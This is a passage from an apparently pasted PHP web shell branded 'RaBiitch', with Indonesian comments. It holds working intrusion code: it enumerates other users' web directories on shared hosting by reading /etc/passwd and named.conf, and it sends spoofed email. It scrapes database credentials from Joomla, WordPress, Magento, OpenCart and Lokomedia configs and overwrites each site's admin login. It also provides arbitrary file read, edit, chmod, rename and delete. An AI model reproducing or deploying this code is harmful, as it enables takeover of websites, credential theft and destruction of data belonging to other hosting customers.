  3749. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  3750. while($getss = fgets($fp)) {
  3751. echo $getss;
  3752. }
  3753. echo '</textarea><br>
  3754. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3755. </form></center>';
  3756. }
  3757. } elseif(preg_match("/vhosts/", $dir)) {
  3758. $urls = explode("\r\n", $_POST['url']);
  3759. if(isset($_POST['jump'])) {
  3760. echo "<pre>";
  3761. foreach($urls as $url) {
  3762. $web_vh = "/var/www/vhosts/$url/httpdocs";
  3763. if(is_dir($web_vh) === true) {
  3764. if(is_readable($web_vh)) {
  3765. $i++;
  3766. $jrw = "[<font color=green>R</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3767. if(is_writable($web_vh)) {
  3768. $jrw = "[<font color=green>RW</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3769. }
  3770. echo $jrw."<br>";
  3771. }
  3772. }
  3773. }
  3774. if($i == 0) {
  3775. } else {
  3776. echo "<br>Total ada ".$i." Kamar di ".$ip;
  3777. }
  3778. echo "</pre>";
  3779. } else {
  3780. echo '<center>
  3781. <form method="post">
  3782. List Domains: <br>
  3783. <textarea name="url" style="width: 500px; height: 250px;">';
  3784. bing("ip:$ip");
  3785. echo '</textarea><br>
  3786. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3787. </form></center>';
  3788. }
  3789. } else {
  3790. echo "<pre>";
  3791. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  3792. while($passwd = fgets($etc)) {
  3793. if($passwd == '' || !$etc) {
  3794. echo "<font color=red>Can't read /etc/passwd</font>";
  3795. } else {
  3796. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  3797. foreach($user_jumping[1] as $myuser_jump) {
  3798. $user_jumping_dir = "/home/$myuser_jump/public_html";
  3799. if(is_readable($user_jumping_dir)) {
  3800. $i++;
  3801. $jrw = "[<font color=green>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3802. if(is_writable($user_jumping_dir)) {
  3803. $jrw = "[<font color=green>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3804. }
  3805. echo $jrw;
  3806. if(function_exists('posix_getpwuid')) {
  3807. $domain_jump = file_get_contents("/etc/named.conf");
  3808. if($domain_jump == '') {
  3809. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  3810. } else {
  3811. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  3812. foreach($domains_jump[1] as $dj) {
  3813. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3814. $user_jumping_url = $user_jumping_url['name'];
  3815. if($user_jumping_url == $myuser_jump) {
  3816. echo " => ( <u>$dj</u> )<br>";
  3817. break;
  3818. }
  3819. }
  3820. }
  3821. } else {
  3822. echo "<br>";
  3823. }
  3824. }
  3825. }
  3826. }
  3827. }
  3828. if($i == 0) {
  3829. } else {
  3830. echo "<br>Total ada ".$i." Kamar di ".$ip;
  3831. }
  3832. echo "</pre>";
  3833. }
  3834. echo "</div>";
  3835. }elseif($_GET['RaBiitch'] == 'mail') {
  3836. if($_POST['send']) {
  3837. $to = $_POST['to'];
  3838. $from = $_POST['from'];
  3839. $subject = $_POST['subject'];
  3840. $content = sulap($_POST['content']);
  3841. if(@mail($to,$subject,$content,"FROM:$from")) {
  3842. $out = "Mail sent to $to";
  3843. } else {
  3844. $out = "Failed !!";
  3845. }
  3846. }
  3847. echo "<h1>Mailer</h1>
  3848. <form method='post'>
  3849. <textarea name='content' value='Patch your security !' placeholder='Patch your security !'></textarea><br>
  3850. Subject :
  3851. <input type='text' name='subject' value='Your Website'><br>
  3852. To : <input type='text' name='to' value='admin@web.com'><br>From : <input type='text' name='from' value='email_lu@gmail.com'><br><input type='submit' name='send' value='Send'><br><br>";
  3853. echo $out;
  3854. }elseif($_GET['RaBiitch'] == 'edituser') {
  3855. if($_POST['hajar']) {
  3856. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  3857. echo "username atau password harus lebih dari 6 karakter";
  3858. } else {
  3859. $user_baru = $_POST['user_baru'];
  3860. $pass_baru = md5($_POST['pass_baru']);
  3861. $conf = $_POST['config_dir'];
  3862. $scan_conf = scandir($conf);
  3863. foreach($scan_conf as $file_conf) {
  3864. if(!is_file("$conf/$file_conf")) continue;
  3865. $config = file_get_contents("$conf/$file_conf");
  3866. if(preg_match("/JConfig|joomla/",$config)) {
  3867. $dbhost = ambilkata($config,"host = '","'");
  3868. $dbuser = ambilkata($config,"user = '","'");
  3869. $dbpass = ambilkata($config,"password = '","'");
  3870. $dbname = ambilkata($config,"db = '","'");
  3871. $dbprefix = ambilkata($config,"dbprefix = '","'");
  3872. $prefix = $dbprefix."users";
  3873. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3874. $db = mysql_select_db($dbname);
  3875. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3876. $result = mysql_fetch_array($q);
  3877. $id = $result['id'];
  3878. $site = ambilkata($config,"sitename = '","'");
  3879. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  3880. echo "Config => ".$file_conf."<br>";
  3881. echo "CMS => Joomla<br>";
  3882. if($site == '') {
  3883. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3884. } else {
  3885. echo "Sitename => $site<br>";
  3886. }
  3887. if(!$update OR !$conn OR !$db) {
  3888. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3889. } else {
  3890. echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3891. }
  3892. mysql_close($conn);
  3893. } elseif(preg_match("/WordPress/",$config)) {
  3894. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3895. $dbuser = ambilkata($config,"DB_USER', '","'");
  3896. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3897. $dbname = ambilkata($config,"DB_NAME', '","'");
  3898. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3899. $prefix = $dbprefix."users";
  3900. $option = $dbprefix."options";
  3901. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3902. $db = mysql_select_db($dbname);
  3903. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3904. $result = mysql_fetch_array($q);
  3905. $id = $result[ID];
  3906. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3907. $result2 = mysql_fetch_array($q2);
  3908. $target = $result2[option_value];
  3909. if($target == '') {
  3910. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3911. } else {
  3912. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  3913. }
  3914. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  3915. echo "Config => ".$file_conf."<br>";
  3916. echo "CMS => Wordpress<br>";
  3917. echo $url_target;
  3918. if(!$update OR !$conn OR !$db) {
  3919. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3920. } else {
  3921. echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3922. }
  3923. mysql_close($conn);
  3924. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  3925. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  3926. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  3927. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  3928. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  3929. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  3930. $prefix = $dbprefix."admin_user";
  3931. $option = $dbprefix."core_config_data";
  3932. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3933. $db = mysql_select_db($dbname);
  3934. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3935. $result = mysql_fetch_array($q);
  3936. $id = $result[user_id];
  3937. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  3938. $result2 = mysql_fetch_array($q2);
  3939. $target = $result2[value];
  3940. if($target == '') {
  3941. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3942. } else {
  3943. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  3944. }
  3945. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3946. echo "Config => ".$file_conf."<br>";
  3947. echo "CMS => Magento<br>";
  3948. echo $url_target;
  3949. if(!$update OR !$conn OR !$db) {
  3950. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3951. } else {
  3952. echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3953. }
  3954. mysql_close($conn);
  3955. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  3956. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  3957. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  3958. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  3959. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  3960. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  3961. $prefix = $dbprefix."user";
  3962. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3963. $db = mysql_select_db($dbname);
  3964. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3965. $result = mysql_fetch_array($q);
  3966. $id = $result[user_id];
  3967. $target = ambilkata($config,"HTTP_SERVER', '","'");
  3968. if($target == '') {
  3969. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3970. } else {
  3971. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  3972. }
  3973. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3974. echo "Config => ".$file_conf."<br>";
  3975. echo "CMS => OpenCart<br>";
  3976. echo $url_target;
  3977. if(!$update OR !$conn OR !$db) {
  3978. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3979. } else {
  3980. echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3981. }
  3982. mysql_close($conn);
  3983. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  3984. $dbhost = ambilkata($config,'server = "','"');
  3985. $dbuser = ambilkata($config,'username = "','"');
  3986. $dbpass = ambilkata($config,'password = "','"');
  3987. $dbname = ambilkata($config,'database = "','"');
  3988. $prefix = "users";
  3989. $option = "identitas";
  3990. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3991. $db = mysql_select_db($dbname);
  3992. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  3993. $result = mysql_fetch_array($q);
  3994. $target = $result[alamat_website];
  3995. if($target == '') {
  3996. $target2 = $result[url];
  3997. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3998. if($target2 == '') {
  3999. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  4000. } else {
  4001. $cek_login3 = file_get_contents("$target2/adminweb/");
  4002. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  4003. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  4004. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  4005. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  4006. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  4007. } else {
  4008. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  4009. }
  4010. }
  4011. } else {
  4012. $cek_login = file_get_contents("$target/adminweb/");
  4013. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  4014. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  4015. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  4016. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  4017. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  4018. } else {
  4019. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  4020. }
  4021. }
  4022. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  4023. echo "Config => ".$file_conf."<br>";
  4024. echo "CMS => Lokomedia<br>";
  4025. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  4026. echo $url_target2;
  4027. } else {
  4028. echo $url_target;
  4029. }
  4030. if(!$update OR !$conn OR !$db) {
  4031. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  4032. } else {
  4033. echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  4034. }
  4035. mysql_close($conn);
  4036. }
  4037. }
  4038. }
  4039. } else {
  4040. echo "<center>
  4041. <h1>Auto Edit User Config</h1>
  4042. <form method='post'>
  4043. DIR Config: <br>
  4044. <input type='text' size='50' name='config_dir' value='$path'><br><br>
  4045. Set User & Pass: <br>
  4046. <input type='text' name='user_baru' value='RaBiitch' placeholder='user_baru'><br>
  4047. <input type='text' name='pass_baru' value='RaBiitch' placeholder='pass_baru'><br>
  4048. <input type='submit' name='hajar' value='Edit' style='width: 215px;'>
  4049. </form>";
  4050. }
  4051. }elseif(isset($_GET['filesrc'])){
  4052. echo "<tr><td>Current File : ";
  4053. echo $_GET['filesrc'];
  4054. echo '</tr></td></table><br/>';
  4055. echo('<textarea cols="80" rows="20" readonly>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  4056. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
  4057. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  4058. if($_POST['opt'] == 'chmod'){
  4059. if(isset($_POST['perm'])){
  4060. if(chmod($_POST['path'],$_POST['perm'])){
  4061. echo '<font color="green">Success !</font><br/>';
  4062. }else{
  4063. echo '<font color="red">Denied !</font><br />';
  4064. }
  4065. }
  4066. echo '<form method="POST">
  4067. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
  4068. <input type="hidden" name="path" value="'.$_POST['path'].'">
  4069. <input type="hidden" name="opt" value="chmod">
  4070. <input type="submit" value="Go" />
  4071. </form>';
  4072. }
  4073. elseif($_POST['opt'] == 'rename'){
  4074. if(isset($_POST['newname'])){
  4075. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  4076. echo '<font color="green">Success !</font><br/>';
  4077. }else{
  4078. echo '<font color="red">Denied !</font><br />';
  4079. }
  4080. $_POST['name'] = $_POST['newname'];
  4081. }
  4082. echo '<form method="POST">
  4083. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
  4084. <input type="hidden" name="path" value="'.$_POST['path'].'">
  4085. <input type="hidden" name="opt" value="rename">
  4086. <input type="submit" value="Go" />
  4087. </form>';
  4088. }elseif($_POST['opt'] == 'edit'){
  4089. if(isset($_POST['src'])){
  4090. $fp = fopen($_POST['path'],'w');
  4091. if(fwrite($fp,$_POST['src'])){
  4092. echo '<font color="green">Success !</font><br/>';
  4093. }else{
  4094. echo '<font color="red">Denied !</font><br/>';
  4095. }
  4096. fclose($fp);
  4097. }
  4098. echo '<form method="POST">
  4099. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
  4100. <input type="hidden" name="path" value="'.$_POST['path'].'">
  4101. <input type="hidden" name="opt" value="edit">
  4102. <input type="submit" value="Save" />
  4103. </form>';
  4104. }
  4105. echo '</center>';
  4106. }else{
  4107. echo '</table><br/><center>';
  4108. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
  4109. if($_POST['type'] == 'dir'){
  4110. if(rmdir($_POST['path'])){
  4111. echo '<font color="green">Success !</font><br/>';
  4112. }else{
  4113. echo '<font color="red">Denied ! </font><br/>';
  4114. }
  4115. }elseif($_POST['type'] == 'file'){
  4116. if(unlink($_POST['path'])){
  4117. echo '<font color="green">Success</font><br/>';
  4118. }else{
  4119. echo '<font color="red">Denied</font><br/>';
  4120. }
  4121. }
  4122. }
  4123. echo '</center>';
  4124. $scandir = scandir($path);
  4125. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  4126. <tr class="first">
  4127. <td><center>Name</center></td>
  4128. <td><center>Size</center></td>
  4129. <td><center>Permission</center></td>
  4130. <td><center>Action</center></td>
  4131. </tr>';
  4132.  
  4133. foreach($scandir as $dir){
  4134. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
  4135. echo '<tr>
  4136. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
  4137. <td><center>--</center></td>
  4138. <td><center>';
  4139. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
  4140. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
  4141. echo perms($path.'/'.$dir);
  4142. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
  4143.  
  4144. echo '</center></td>
  4145. <td><center><form method="POST" action="?option&path='.$path.'">
  4146. <select name="opt">
  4147. <option value="">Select</option>
  4148. <option value="delete">Delete</option>
  4149. <option value="chmod">Chmod</option>
  4150. <option value="rename">Rename</option>
  4151. </select>
  4152. <input type="hidden" name="type" value="dir">
  4153. <input type="hidden" name="name" value="'.$dir.'">
  4154. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
  4155. <input type="submit" value=">">
  4156. </form></center></td>
  4157. </tr>';
  4158. }
  4159. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
  4160. foreach($scandir as $file){
  4161. if(!is_file($path.'/'.$file)) continue;
  4162. $size = filesize($path.'/'.$file)/1024;
  4163. $size = round($size,3);
  4164. if($size >= 1024){
  4165. $size = round($size/1024,2).' MB';
  4166. }else{
  4167. $size = $size.' KB';
  4168. }
  4169.  
  4170. echo '<tr>
  4171. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
  4172. <td><center>'.$size.'</center></td>
  4173. <td><center>';
  4174. if(is_writable($path.'/'.$file)) echo '<font color="green">';
  4175. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  4176. echo perms($path.'/'.$file);
  4177. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  4178. echo '</center></td>
  4179. <td><center><form method="POST" action="?option&path='.$path.'">
  4180. <select name="opt">
  4181. <option value="">Select</option>
  4182. <option value="delete">Delete</option>
  4183. <option value="chmod">Chmod</option>
  4184. <option value="rename">Rename</option>
  4185. <option value="edit">Edit</option>
  4186. </select>
  4187. <input type="hidden" name="type" value="file">
  4188. <input type="hidden" name="name" value="'.$file.'">
  4189. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  4190. <input type="submit" value=">">
  4191. </form></center></td>
  4192. </tr>';
  4193. }
  4194. echo '</table>
  4195. </div></div>';
  4196. }
  4197. echo '<center><br/>Copyright &copy '.date("Y").' <a href="https://www.rabiitch.ga/" target="_blank">RaBiitch Official</a></center>
  4198. </body>
  4199. </html>';
  4200. ?>
Add Comment
Please, Sign In to add comment